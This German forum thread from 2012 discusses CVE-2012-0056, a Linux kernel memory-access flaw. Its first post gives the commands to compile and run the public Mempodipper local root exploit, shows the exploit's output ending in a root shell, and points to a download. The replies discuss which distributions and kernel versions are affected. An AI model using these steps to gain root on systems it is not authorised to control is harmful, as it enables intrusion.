1. #1

    Registriert seit
    18.11.2011
    Beiträge
    527
    Thanked 668 Times in 451 Posts

    Standard Linux: Root-Rechte durch Speicherzugriff

    Linus Torvalds hat letzte Woche ein Linux-Kernel-Update veröffentlicht, das einen Fehler bei der Zugriffskontrolle auf Speicherabbilder beheben soll. Kurz darauf tauchten Exploits auf, die es ermöglichen, über diesen Fehler Root-Rechte zu erlangen.

    Für alle die Ihr 64bit LInuxsystem mal testen wollen: heise online | Linux: Root-Rechte durch Speicherzugriff


    Code:
    gcc mempodipper.c -o mempodipper
    ./mempodipper
    
    ===============================
    =          Mempodipper        =
    =           by zx2c4          =
    =         Jan 21, 2012        =
    ===============================
    
    [+] Opening socketpair.
    [+] Waiting for transferred fd in parent.
    [+] Executing child from child fork.
    [+] Opening parent mem /proc/12439/mem in child.
    [+] Sending fd 5 to parent.
    [+] Received fd at 5.
    [+] Assigning fd 5 to stderr.
    [+] Ptracing su to find next instruction without reading binary.
    [+] Resolved exit@plt to 0x401ce8.
    [+] Calculating su padding.
    [+] Seeking to offset 0x401cdc.
    [+] Executing su with shellcode.
    sh-4.2# id
    uid=0(root) gid=0(root) groups=0(root),4(adm),20(dialout),24(cdrom),29(audio),44(video),46(plugdev),115(lpadmin),117(admin),122(sambashare)
    sh-4.2#
    Das Binary ist für 64bit, für 32bit das c-file wie folgt übersetzen:

    Code:
    gcc -Wall -g -static mempodipper.c -o mempodipper_static
    Download: CVE-2012-0056 - Mempodipper, a linux local root exploit.




  2. #2

    Registriert seit
    28.10.2011
    Beiträge
    625
    Thanked 279 Times in 168 Posts

    Standard AW: Linux: Root-Rechte durch Speicherzugriff

    Anscheinend iszt da aber nicht jede Distribution von betroffen. Laut aussagen nur für Ubuntu(?), keine ahnung..

  3. #3
    Avatar von Ta1lor
    Registriert seit
    15.11.2011
    Beiträge
    767
    Thanked 832 Times in 435 Posts

    Standard AW: Linux: Root-Rechte durch Speicherzugriff

    Ubuntu und Redhat (Halt alle die, die den Kernel nutzen). Debian nutzt noch ältere Kernel Versionen. Ab 2.6.39 ist der Kernel Vuln.
    Geändert von Ta1lor (25.01.2012 um 12:32 Uhr)

  4. The Following User Says Thank You to Ta1lor For This Useful Post:

    Gameboy9 (15.10.2015)

Ähnliche Themen

  1. Win7 Fehlende Rechte?
    Von dGL im Forum Windows
    Antworten: 2
    Letzter Beitrag: 04.06.2013, 19:11
  2. ROOT Rechte auf Samsung Galaxy Note 2?
    Von ZarneXxX im Forum Android
    Antworten: 3
    Letzter Beitrag: 16.01.2013, 15:48
  3. Busfahrer Rechte
    Von Mr.Bombastic im Forum Recht- und Verbraucherschutz
    Antworten: 13
    Letzter Beitrag: 29.09.2012, 19:45
  4. TS Rechte fehlen
    Von Prinzessin Paat im Forum Support
    Antworten: 1
    Letzter Beitrag: 14.04.2012, 10:53
  5. Verschenke Root Server mit Windows/Linux
    Von Electro im Forum Verschenke
    Antworten: 14
    Letzter Beitrag: 11.03.2012, 21:35
Diese Seite nutzt Cookies, um das Nutzererlebnis zu verbessern. Klicken Sie hier, um das Cookie-Tracking zu deaktivieren.